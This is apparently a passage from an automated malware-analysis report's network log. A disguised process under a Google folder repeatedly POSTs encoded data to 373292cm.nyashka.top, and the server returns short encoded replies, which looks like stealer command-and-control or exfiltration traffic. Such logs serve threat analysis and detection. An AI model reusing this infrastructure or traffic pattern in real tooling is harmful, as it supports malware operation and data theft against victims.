                                    Aug 25, 2024 15:45:54.997898102 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:55.355242014 CEST2544OUTData Raw: 5f 50 59 57 51 42 51 5b 5b 5f 5a 51 59 56 58 50 57 5a 5d 5a 57 5a 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYWQBQ[[_ZQYVXPWZ]ZWZS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,U'A!<\7#9X+-$Y(X6<(7/ !<<:7Y4V%],>&F$.Y/!
                                    Aug 25, 2024 15:45:55.661264896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:55.793395042 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    14 | 192.168.2.8 | 49727 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:56.153425932 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:56.511480093 CEST | 2544 | OUT | Data Raw: 5f 51 5c 52 54 46 54 5c 5b 5f 5a 51 59 50 58 56 57 5d 5d 5e 57 5e 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _Q\RTFT\[_ZQYPXVW]]^W^S[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y.#'B#. %Y>.<_+%(=<#' "'?)3Y 05,&F$.Y/
                                    Aug 25, 2024 15:45:56.816633940 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:57.019999027 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    15 | 192.168.2.8 | 49728 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:57.033442020 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:57.386363029 CEST | 1860 | OUT | Data Raw: 5f 52 5c 51 54 47 51 59 5b 5f 5a 51 59 5f 58 56 57 58 5d 5c 57 5d 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _R\QTGQY[_ZQY_XVWX]\W]S\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.. $64 0>=/+*<.44<7#!,V<:'_ #*/&F$.Y/
                                    Aug 25, 2024 15:45:57.698116064 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:57.825965881 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0e 2a 0b 36 58 32 28 30 55 33 33 08 53 3d 03 2b 5b 3d 13 29 17 33 38 25 1a 32 00 24 1c 30 3b 0c 05 3f 00 0f 0e 24 3f 2b 5a 39 34 2b 5d 0c 13 22 16 37 5c 32 59 32 12 2f 02 3d 3b 28 04 22 12 2a 5b 3c 3a 25 55 3f 2c 2c 5a 28 17 09 59 2b 3a 3d 0f 2c 06 21 5c 39 0e 00 54 22 2e 2b 52 0d 11 24 52 28 03 3e 0e 29 00 2b 58 21 28 06 07 24 5b 39 0d 25 0c 3a 55 30 39 38 5c 31 0c 3d 50 30 31 3e 0e 25 2b 26 5a 26 2c 22 0c 35 08 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %*6X2(0U33S=+[=)38%2$0;?$?+Z94+]"7\2Y2/=;("*[<:%U?,,Z(Y+:=,!\9T".+R$R(>)+X!($[9%:U098\1=P01>%+&Z&,"5#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    16 | 192.168.2.8 | 49729 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:57.177337885 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:57.526995897 CEST | 2544 | OUT | Data Raw: 5f 5d 59 57 51 40 54 5d 5b 5f 5a 51 59 52 58 57 57 58 5d 5c 57 51 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]YWQ@T][_ZQYRXWWX]\WQSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/("[$]7#").<_?>+[ ?+#1(94,&F$.Y/1
                                    Aug 25, 2024 15:45:57.870264053 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:58.007872105 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    17 | 192.168.2.8 | 49730 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:58.146270037 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:58.529500961 CEST | 2544 | OUT | Data Raw: 5a 51 5c 56 54 45 54 5a 5b 5f 5a 51 59 5e 58 53 57 59 5d 5c 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\VTETZ[_ZQY^XSWY]\W\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.;#;B".# 05=(X:(.<"??V!1<P(*87=/.&F$.Y/
                                    Aug 25, 2024 15:45:58.843067884 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:58.973478079 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    18 | 192.168.2.8 | 49731 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:59.110080004 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:59.464617014 CEST | 2544 | OUT | Data Raw: 5f 51 59 50 54 42 54 5c 5b 5f 5a 51 59 54 58 50 57 51 5d 5d 57 58 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _QYPTBT\[_ZQYTXPWQ]]WXSTYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y8'6> V5)(^(%\?'4?0 (?*# V%X/&F$.Y/)
                                    Aug 25, 2024 15:45:59.840971947 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:59.975656033 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    19 | 192.168.2.8 | 49732 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:00.115777016 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:00.464634895 CEST | 2544 | OUT | Data Raw: 5a 52 5c 56 51 43 54 59 5b 5f 5a 51 59 55 58 55 57 58 5d 53 57 58 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\VQCTY[_ZQYUXUWX]SWXS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,,#-;4*0^(==(]##!/+_7705\;.&F$.Y/-
                                    Aug 25, 2024 15:46:00.779917955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:00.916496038 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    20 | 192.168.2.8 | 49733 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:01.229039907 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:01.574091911 CEST | 2544 | OUT | Data Raw: 5f 56 59 55 54 49 54 5e 5b 5f 5a 51 59 56 58 53 57 5f 5d 5b 57 5e 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYUTIT^[_ZQYVXSW_][W^SZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-8/D6;76+-++9])-;",V#()_ !^/>&F$.Y/!
                                    Aug 25, 2024 15:46:01.913039923 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:02.044051886 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    21 | 192.168.2.8 | 49734 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:02.169291019 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:02.527226925 CEST | 2544 | OUT | Data Raw: 5f 55 59 57 51 40 54 5c 5b 5f 5a 51 59 51 58 54 57 5c 5d 58 57 5f 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _UYWQ@T\[_ZQYQXTW\]XW_SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/#A!?7#>>/<.:+7<7S71+_$#0\/.&F$.Y/=


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    22 | 192.168.2.8 | 49735 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:02.855420113 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:03.224140882 CEST | 1860 | OUT | Data Raw: 5f 53 5c 55 54 44 51 5b 5b 5f 5a 51 59 50 58 54 57 51 5d 5d 57 5e 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\UTDQ[[_ZQYPXTWQ]]W^SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;'B5><\7]+>4\()\<<7#Q4#(907 >,>&F$.Y/
                                    Aug 25, 2024 15:46:03.533451080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:03.677320004 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1e 2a 43 22 5c 25 05 0a 52 30 0a 3a 56 3e 2e 3c 00 3e 2e 29 14 24 16 3d 17 25 10 38 55 30 05 26 01 28 3e 22 1b 24 3f 3b 10 3a 1e 2b 5d 0c 13 21 06 23 39 2a 10 26 12 24 10 29 38 3f 18 21 05 2a 1e 3c 3a 2a 08 3e 2f 3b 01 2b 29 3c 01 2a 39 22 53 2c 38 3a 06 39 33 26 1c 22 3e 2b 52 0d 11 24 10 28 5b 2d 1e 28 3e 3b 5c 35 16 30 03 33 3e 26 1c 26 1c 03 0a 27 29 23 05 25 21 25 12 25 31 25 1d 31 02 3e 5e 25 59 3d 54 22 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &*C"\%R0:V>.<>.)$=%8U0&(>"$?;:+]!#9*&$)8?!*<:*>/;+)<*9"S,8:93&">+R$([-(>;\503>&&')#%!%%1%1>^%Y=T"2#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    23 | 192.168.2.8 | 49736 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:02.972532988 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:03.324052095 CEST | 2544 | OUT | Data Raw: 5f 54 59 57 51 40 51 5a 5b 5f 5a 51 59 5e 58 50 57 50 5d 5d 57 5f 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYWQ@QZ[_ZQY^XPWP]]W_SZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,00!=+" [=>0](+']#,<#0R<49,&F$.Y/
                                    Aug 25, 2024 15:46:03.672297001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:03.805984020 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    24 | 192.168.2.8 | 49737 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:03.944048882 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:04.326533079 CEST | 2544 | OUT | Data Raw: 5f 53 5c 54 51 45 54 5e 5b 5f 5a 51 59 52 58 52 57 5a 5d 5f 57 51 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\TQET^[_ZQYRXRWZ]_WQSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/3'@#=;# 5]*.,X?6<,4R 1S+84V9].>&F$.Y/1
                                    Aug 25, 2024 15:46:04.630203009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:04.761840105 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    25 | 192.168.2.8 | 49738 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:04.888206005 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:05.245898962 CEST | 2536 | OUT | Data Raw: 5f 52 5c 5f 51 44 54 5a 5b 5f 5a 51 59 57 58 55 57 5e 5d 5b 57 58 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _R\_QDTZ[_ZQYWXUW^][WXSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.],U !.# #=)>(+.+=/X4/7(?<##=.>&F$.Y/-
                                    Aug 25, 2024 15:46:05.552472115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:05.682090044 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    26 | 192.168.2.8 | 49739 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
